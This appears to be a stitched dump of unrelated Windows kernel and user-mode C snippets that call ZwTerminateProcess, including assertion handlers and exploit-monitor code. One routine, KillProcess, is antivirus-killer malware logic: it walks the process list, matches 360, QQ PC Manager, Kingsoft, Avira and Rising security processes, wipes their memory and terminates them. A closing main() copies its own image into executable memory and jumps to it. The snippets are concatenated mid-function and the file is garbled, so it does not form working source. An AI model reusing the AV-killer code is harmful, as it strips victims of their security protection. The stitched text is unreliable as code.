VOID
RtlAssert(
IN PVOID FailedAssertion,
IN PVOID FileName,
IN ULONG LineNumber,
IN PCHAR Message OPTIONAL
)
{
#if DBG || RTL_ASSERT_ALWAYS_ENABLED
char Response[ 2 ];
CONTEXT Context;
#ifndef BLDR_KERNEL_RUNTIME
RtlCaptureContext( &Context );
#endif
while (TRUE) {
DbgPrint( "\n*** Assertion failed: %s%s\n*** Source File: %s, line %ld\n\n",
Message ? Message : "",
FailedAssertion,
FileName,
LineNumber
);
DbgPrompt( "Break, Ignore, Terminate Process or Terminate Thread (bipt)? ",
Response,
sizeof( Response )
);
switch (Response[0]) {
case 'B':
case 'b':
DbgPrint( "Execute '!cxr %p' to dump context\n", &Context);
DbgBreakPoint();
break;
case 'I':
case 'i':
return;
case 'P':
case 'p':
ZwTerminateProcess( NtCurrentProcess(), STATUS_UNSUCCESSFUL );
break;
case 'T':
case 't':
ZwTerminateThread( NtCurrentThread(), STATUS_UNSUCCESSFUL );
break;
}
}
DbgBreakPoint();
ZwTerminateProcess( NtCurrentProcess(), STATUS_UNSUCCESSFUL );
#endif
}
/*******************************************************************************
*
* 函 数 名 : CreateProcessNotifyRoutine
* 功能描述 : 判断创建的进程是否为拒绝运行程序,是的话结束
* 参数列表 :
* 说 明 : 通过PID取得EPROCESS对象,再从里面取名字判断是否为拒绝运行的
* 程序,是的话再通过PID打开进程,结束进程
* 返回结果 : 无
*
*******************************************************************************/
VOID CreateProcessNotifyRoutine (IN HANDLE ParentId,
IN HANDLE ProcessId,
IN BOOLEAN Create )
{
PEPROCESS pEProcess = NULL ;
OBJECT_ATTRIBUTES ObjectAttributes;
CLIENT_ID clientid;
HANDLE handle ;
return ;
// 进程创建
if (Create)
{
if (0 != ProcessId)
{
if(NT_SUCCESS(PsLookupProcessByProcessId(ProcessId, &pEProcess)))
{
ObDereferenceObject(pEProcess) ;
// 这里可以再比一下进程名
InitializeObjectAttributes(&ObjectAttributes, 0 ,OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 0, 0);
clientid.UniqueProcess = (HANDLE)ParentId;
clientid.UniqueThread=0;
if(NT_SUCCESS(ZwOpenProcess(&handle, PROCESS_ALL_ACCESS, &ObjectAttributes, &clientid)))
{
ZwTerminateProcess(handle, 0) ;
}
}
}
}
// 程序退出
else
{
}
}
NTSTATUS BDKitTerminateProcessByAPI( __in PEPROCESS EProcess, __in ULONG ExitCode )
{
NTSTATUS nsStatus = STATUS_UNSUCCESSFUL;
HANDLE hProcess = NULL;
BOOLEAN bAttach = FALSE;
KAPC_STATE kApcState = {0x00};
do
{
if ( bAttach == TRUE )
{
_KeStackAttachProcess ((PKPROCESS)EProcess, &kApcState);
nsStatus = ZwTerminateProcess (0, STATUS_SUCCESS);
}
else
{
nsStatus = ObOpenObjectByPointer (
EProcess,
OBJ_KERNEL_HANDLE,
NULL,
PROCESS_ALL_ACCESS,
NULL,
KernelMode,
&hProcess
);
BDKit_If_Not_Break(NT_SUCCESS(nsStatus));
nsStatus = ZwTerminateProcess (hProcess, ExitCode);
}
BDKit_If_Not_Break(NT_SUCCESS(nsStatus));
} while (FALSE);
if ( IsKernelHandle(hProcess, KernelMode) )
{
BDKitCloseHandle(hProcess);
}
//BDKitCloseObject(EProcess);
return nsStatus;
}
void fasttrap_winsig(pid_t pid, uintptr_t addr)
{
CLIENT_ID cid1 = {(HANDLE) pid, 0};
OBJECT_ATTRIBUTES attr;
HANDLE hProcess = 0;
NTSTATUS status;
UNREFERENCED_PARAMETER(addr);
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &cid1);
if (status == STATUS_SUCCESS) {
status = ZwTerminateProcess(hProcess, 0);
ZwClose(hProcess);
}
}
// Terminates a given process as well as its child process, and wait for
// terminatation of the given process
_Use_decl_annotations_ static NTSTATUS EopmonpTerminateProcessTree(
HANDLE process_handle, HANDLE pid) {
PAGED_CODE();
auto status = ZwTerminateProcess(process_handle, 0);
HYPERPLATFORM_LOG_DEBUG(
"Exploitation detected. Process %Iu is being terminated (status = %08x).",
pid, status);
if (status == STATUS_PROCESS_IS_TERMINATING) {
return status;
}
status = EopmonpForEachProcess(EopmonpTerminateProcessIfChild, pid);
NT_VERIFY(NT_SUCCESS(status));
status = ZwWaitForSingleObject(process_handle, FALSE, nullptr);
NT_VERIFY(NT_SUCCESS(status));
return status;
}
//
//InteceptProcess is callback notify routine that be set by
//PsSetLoadImageNotifyRoutine kernel function
//
VOID InterceptProcess(
IN PUNICODE_STRING FullImageName,
IN HANDLE ProcessId, // where image is mapped
IN PIMAGE_INFO ImageInfo
)
{
NTSTATUS ntStatus;
OBJECT_ATTRIBUTES objAttr;
CLIENT_ID ClientId = {0};
HANDLE hCurProcess;
ClientId.UniqueProcess = ProcessId;
InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
ntStatus = ZwOpenProcess(&hCurProcess, PROCESS_ALL_ACCESS, &objAttr, &ClientId);
if (NT_SUCCESS(ntStatus))
{
PROCESS_BASIC_INFORMATION PBICurProc = {0};
ULONG ulRtn;
// NtQueryInformationProcess(hProcess, ProcessBasicInformation, &ProcInfo, sizeof (ProcInfo), &ulRtn);
ntStatus = NtQueryInformationProcess(hCurProcess, ProcessBasicInformation, &PBICurProc, sizeof (PBICurProc), &ulRtn);
KdPrint(("LoadImageNotify: NtQueryInformation ERROR CODE: 0x%08x\n", ntStatus));
if (NT_SUCCESS(ntStatus))
{
PEPROCESS pEParent;
KdPrint(("LoadImageNotify: NtQueryInformationProcess Successfully!\n"));
ntStatus = PsLookupProcessByProcessId((HANDLE)PBICurProc.InheritedFromUniqueProcessId, &pEParent);
if (NT_SUCCESS(ntStatus))
{
if (IsInterceptionProcess(pEParent))
{
KdPrint(("This Process's parent process is TENCENT IM\n"));
ZwTerminateProcess(hCurProcess, 0);
}
ObDereferenceObject(pEParent);
}
}
ZwClose(hCurProcess);
}
}
//
// Native exception filter
//
LONG
NTAPI
ExceptionFilter(
PEXCEPTION_POINTERS einfo
)
{
PEXCEPTION_RECORD erec = einfo->ExceptionRecord;
if (erec->ExceptionCode != MANUALLY_INITIATED_CRASH)
{
Print (
"********************************************\n"
"* Unhandled exception caught *\n"
"********************************************\n"
"Exception Record: %08x\n"
"Context Record: %08x\n"
"********************************************\n"
"Exception %08x occurred at %08x\n"
"Number parameters: %d\n"
"Parameters: %08x %08x %08x %08x\n"
"The process will be terminated\n"
"********************************************\n"
,
einfo->ExceptionRecord,
einfo->ContextRecord,
erec->ExceptionCode,
erec->ExceptionAddress,
erec->NumberParameters,
erec->ExceptionInformation[0],
erec->ExceptionInformation[1],
erec->ExceptionInformation[2],
erec->ExceptionInformation[3]
);
}
else
{
ZwTerminateProcess (NtCurrentProcess(),
MANUALLY_INITIATED_CRASH);
}
return EXCEPTION_EXECUTE_HANDLER;
}
// Terminates a process if it is created from a dodgy process
_Use_decl_annotations_ static bool EopmonpTerminateProcessIfChild(
HANDLE pid, void* context) {
PAGED_CODE();
const auto dodgy_pid = reinterpret_cast<HANDLE>(context);
const auto process_handle = EopmonpOpenProcess(pid);
if (!process_handle) {
return true;
}
// Is this process created from the dodgy process?
const auto parent_pid =
EopmonpGetProcessParentProcessIdByHandle(process_handle);
if (parent_pid != dodgy_pid) {
goto exit;
}
// Is this process created later than the dodgy process?
const auto create_time = EopmonpGetProcessCreateTimeQuadPart(pid);
const auto parent_create_time =
EopmonpGetProcessCreateTimeQuadPart(dodgy_pid);
if (!create_time || !parent_create_time ||
create_time <= parent_create_time) {
goto exit;
}
// Yes, terminate this process as well as its child processes
auto status = ZwTerminateProcess(process_handle, 0);
HYPERPLATFORM_LOG_DEBUG(
"Exploitation detected. Process %Iu is being terminated (status = %08x).",
pid, status);
status = EopmonpForEachProcess(EopmonpTerminateProcessIfChild, pid);
NT_VERIFY(NT_SUCCESS(status));
exit:;
ZwClose(process_handle);
return true;
}
/*
* @implemented
*/
VOID
NTAPI
RtlAssert(IN PVOID FailedAssertion,
IN PVOID FileName,
IN ULONG LineNumber,
IN PCHAR Message OPTIONAL)
{
CHAR Action[2];
CONTEXT Context;
/* Capture caller's context for the debugger */
RtlCaptureContext(&Context);
/* Enter prompt loop */
for (;;)
{
/* Print the assertion */
DbgPrint("\n*** Assertion failed: %s%s\n"
"*** Source File: %s, line %lu\n\n",
Message != NULL ? Message : "",
(PSTR)FailedAssertion,
(PSTR)FileName,
LineNumber);
/* Prompt for action */
DbgPrompt("Break repeatedly, break Once, Ignore,"
" terminate Process or terminate Thread (boipt)? ",
Action,
sizeof(Action));
switch (Action[0])
{
/* Break repeatedly */
case 'B': case 'b':
/* Do a breakpoint, then prompt again */
DbgPrint("Execute '.cxr %p' to dump context\n", &Context);
DbgBreakPoint();
break;
/* Ignore */
case 'I': case 'i':
/* Return to caller */
return;
/* Break once */
case 'O': case 'o':
/* Do a breakpoint and return */
DbgPrint("Execute '.cxr %p' to dump context\n", &Context);
DbgBreakPoint();
return;
/* Terminate process*/
case 'P': case 'p':
/* Terminate us */
ZwTerminateProcess(ZwCurrentProcess(), STATUS_UNSUCCESSFUL);
break;
/* Terminate thread */
case 'T': case 't':
/* Terminate us */
ZwTerminateThread(ZwCurrentThread(), STATUS_UNSUCCESSFUL);
break;
/* Unrecognized */
default:
/* Prompt again */
break;
}
}
/* Shouldn't get here */
DbgBreakPoint();
ZwTerminateProcess(ZwCurrentProcess(), STATUS_UNSUCCESSFUL);
}
NTSTATUS ZwCreateSectionHook(HANDLE SectionHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PLARGE_INTEGER MaximumSize, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle)
{
if (/*(DesiredAccess & SECTION_MAP_EXECUTE) && */(AllocationAttributes & SEC_IMAGE) && (SectionPageProtection & PAGE_EXECUTE))
{
PEPROCESS pEParent = NULL;
PROCESS_BASIC_INFORMATION ProcInfo = {0};
NTSTATUS ntStatus = 0;
ULONG ulRtn;
HANDLE hProcess;
CLIENT_ID ProcID = {0};
OBJECT_ATTRIBUTES objAttr;
ProcID.UniqueProcess = PsGetCurrentProcessId();
InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
ntStatus = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &ProcID);
if (NT_SUCCESS(ntStatus))
ntStatus = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &ProcInfo, sizeof (ProcInfo), &ulRtn);
if (NT_SUCCESS(ntStatus))
{
if (NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)ProcInfo.InheritedFromUniqueProcessId, &pEParent)))
{
if (IsInterceptionProcess(pEParent))
{
//_asm int 3;
//KdPrint(("ZwCreateSection Found!!!\n"));
//
//Update information of pwsCrtProcessEvent
//
if (pwsCrtProcessEvent == NULL)
{
pwsCrtProcessEvent = ExAllocatePoolWithTag(PagedPool, (MAX_PATH + 1) * sizeof (wchar_t), 'CP');
if (pwsCrtProcessEvent)
{
PEPROCESS pEProcess = PsGetCurrentProcess();
PSTR pchParentName = (PSTR)((ULONG_PTR)pEParent + ulProcNameOffset), pchProcessName = (PSTR)((ULONG_PTR)pEProcess + ulProcNameOffset);
ANSI_STRING AnsiParentName, AnsiProcessName;
UNICODE_STRING uniParentName, uniProcessName;
ULONG ulPos = 0;
//_asm int 3;
RtlZeroMemory(pwsCrtProcessEvent, (MAX_PATH + 1) * sizeof (wchar_t));
RtlInitAnsiString(&AnsiParentName, pchParentName);
RtlInitAnsiString(&AnsiProcessName, pchProcessName);
RtlAnsiStringToUnicodeString(&uniParentName, &AnsiParentName, TRUE);
RtlAnsiStringToUnicodeString(&uniProcessName, &AnsiProcessName, TRUE);
RtlStringCchPrintfW(pwsCrtProcessEvent, MAX_PATH, L"%ws;CP;%ws[PID: %ld];TRUE;", uniParentName.Buffer, uniProcessName.Buffer, (ULONG)PsGetCurrentProcessId());
RtlFreeUnicodeString(&uniProcessName);
RtlFreeUnicodeString(&uniParentName);
if (pKEvtSync[QD_SYNC_EVENTNAME_CRTPROC])
{
KeSetEvent(pKEvtSync[QD_SYNC_EVENTNAME_CRTPROC], IO_NO_INCREMENT, FALSE);
}
KdPrint(("%S\n", pwsCrtProcessEvent));
}
}
ObDereferenceObject(pEParent);
ZwTerminateProcess(hProcess, 0);
ZwClose(hProcess);
//KdPrint(("ZwCreateSection Found return.\n"));
return(0);
}
ObDereferenceObject(pEParent);
}
}
ZwClose(hProcess);
}
return(ZwCreateSectionReal(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle));
}
NTSTATUS TerminateProcess(HANDLE hProcess, NTSTATUS ExitStatus) {
return ZwTerminateProcess(hProcess, ExitStatus);
}
void KillProcess(PVOID Context)
{
NTSTATUS status;
HANDLE prohd;
BOOLEAN bexe;
ULONG puserAddress;
KAPC_STATE ApcState;
ANSI_STRING imagename;
PEPROCESS pepro,ptempepro;
LARGE_INTEGER timeout;
PSE_AUDIT_PROCESS_CREATION_INFO papc;
ANSI_STRING pastr;
PVOID pstrb=NULL;
while(TRUE)
{
pepro=PsGetCurrentProcess();
ptempepro=pepro;
do
{
bexe=FALSE;
RtlInitAnsiString(&imagename,(PVOID)((ULONG)ptempepro+eprooffset.ImageFileName)); //+0x174 ImageFileName
papc=(PSE_AUDIT_PROCESS_CREATION_INFO)((ULONG)ptempepro+eprooffset.SE_AUDIT_PROCESS_CREATION_INFO);//EPROCESS偏移0x1f4处存放着_SE_AUDIT_PROCESS_CREATION_INFO结构的指针
__try
{
if (papc->ImageFileName->Name.Length!=0)
{
RtlUnicodeStringToAnsiString(&pastr,&papc->ImageFileName->Name,TRUE);
pstrb=strstr(pastr.Buffer,"360");
if (pstrb!=NULL)
{
bexe=TRUE;
}
RtlFreeAnsiString(&pastr);
}
}__except(1){}
KillCompare(&imagename,"360tray.exe",&bexe);
KillCompare(&imagename,"360safe.exe",&bexe);
KillCompare(&imagename,"ZhuDongFangYu.e",&bexe);
KillCompare(&imagename,"360rp.exe",&bexe);
KillCompare(&imagename,"360sd.exe",&bexe);
KillCompare(&imagename,"qqpcrtp.exe",&bexe);
KillCompare(&imagename,"qqpcleakscan.ex",&bexe);
KillCompare(&imagename,"qqpctray.exe",&bexe);
KillCompare(&imagename,"qqpcmgr.exe",&bexe);
KillCompare(&imagename,"ksafe.exe",&bexe);
KillCompare(&imagename,"kscan.exe",&bexe);
KillCompare(&imagename,"kxescore.exe",&bexe);
KillCompare(&imagename,"kxetray.exe",&bexe);
KillCompare(&imagename,"ksafesvc.exe",&bexe);
KillCompare(&imagename,"ksafetray.exe",&bexe);
KillCompare(&imagename,"ksmgui.exe",&bexe);
KillCompare(&imagename,"ksmsvc.exe",&bexe);
KillCompare(&imagename,"avcenter.exe",&bexe);
KillCompare(&imagename,"avgnt.exe",&bexe);
KillCompare(&imagename,"avguard.exe",&bexe);
KillCompare(&imagename,"avshadow.exe",&bexe);
KillCompare(&imagename,"sched.exe",&bexe);
KillCompare(&imagename,"ravmond.exe",&bexe);
KillCompare(&imagename,"rsagent.exe",&bexe);
KillCompare(&imagename,"rstray.exe",&bexe);
KillCompare(&imagename,"rsmgrsvc.exe",&bexe);
if (bexe)
{
KeStackAttachProcess(ptempepro,&ApcState);
for(puserAddress=0;puserAddress<=0x7fffffff;puserAddress+=0x1000)
{
if(MmIsAddressValid((PVOID)puserAddress))
{
__try
{
ProbeForWrite((PVOID)puserAddress,0x1000,sizeof(ULONG));
RtlZeroMemory((PVOID)puserAddress, 0x1000);
}__except(1)
{
continue;
}
}
else
{
if(puserAddress>0x1000000)//填这么多足够破坏进程数据了
{
break;
}
}
}
KeUnstackDetachProcess(&ApcState);
status=ObOpenObjectByPointer(ptempepro,0,NULL,PROCESS_ALL_ACCESS,*PsProcessType,KernelMode,&prohd);
if (NT_SUCCESS(status))
{
ZwTerminateProcess(prohd,0);
ZwClose(prohd);
}
}
ptempepro=(PEPROCESS)((ULONG)(*(PULONG)((ULONG)ptempepro+eprooffset.ActiveProcessLinks))-eprooffset.ActiveProcessLinks); //+0x088 ActiveProcessLinks : _LIST_ENTRY
} while (ptempepro!=pepro);
int main(int argc, char *argv[])
{
if (load_ntdll_functions() == FALSE) {
printf("Failed to load NTDLL function\n");
return (-1);
}
if (load_kernel32_functions() == FALSE) {
printf("Failed to load KERNEL32 function\n");
return (-1);
}
HANDLE hSection = NULL;
PVOID ImageBaseAddress = NtCurrentTeb()->Peb->ImageBaseAddress;
PIMAGE_NT_HEADERS NtHeaders = RtlImageNtHeader(ImageBaseAddress);
if (NtHeaders == NULL)
{
printf("[ERROR] RtlImageNtHeader failed, error : %d\n", GetLastError());
system("pause");
return (-1);
}
LARGE_INTEGER MaximumSize;
ULONG ImageSize = NtHeaders->OptionalHeader.SizeOfImage;
MaximumSize.LowPart = ImageSize;
MaximumSize.HighPart = 0;
NTSTATUS Status = NULL;
if ((Status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &MaximumSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateSection failed, status : %x\n", Status);
system("pause");
return (-1);
}
printf("Section handle: %x\n", hSection);
HANDLE hProcess = NULL;
PVOID pSectionBaseAddress = NULL;
SIZE_T ViewSize = 0;
DWORD dwInheritDisposition = 1; //VIEW_SHARE
// map the section in context of current process:
if ((Status = NtMapViewOfSection(hSection, GetCurrentProcess(), &pSectionBaseAddress, NULL, NULL, NULL, &ViewSize, dwInheritDisposition, NULL, PAGE_EXECUTE_READWRITE))!= STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", Status);
system("pause");
return (-1);
}
printf("Created new section, BaseAddress: %p ViewSize: %p\n", pSectionBaseAddress, ViewSize);
printf("Mapping into: %p <- current image: %p %p\n", pSectionBaseAddress, ImageBaseAddress, ImageSize);
RtlCopyMemory(pSectionBaseAddress, ImageBaseAddress, ImageSize);
ZwClose(hSection);
hSection = NULL;
if (applyRelocations(NtHeaders, pSectionBaseAddress) == FALSE) {
printf("Applying relocations failed, cannot continue!");
ZwTerminateProcess(GetCurrentProcess(), STATUS_FAILURE);
}
printf("Applied relocations!\n");
ULONG_PTR offsetFromBase = (ULONG_PTR) &testFunction - (ULONG_PTR)ImageBaseAddress;
printf("testFunction offset: %p\n", offsetFromBase);
ULONG_PTR newMain = ((ULONG_PTR) pSectionBaseAddress + offsetFromBase);
printf("testFunction address in new section: %p\n", newMain);
__asm {
call newMain
};
system("pause");
return (0);
}
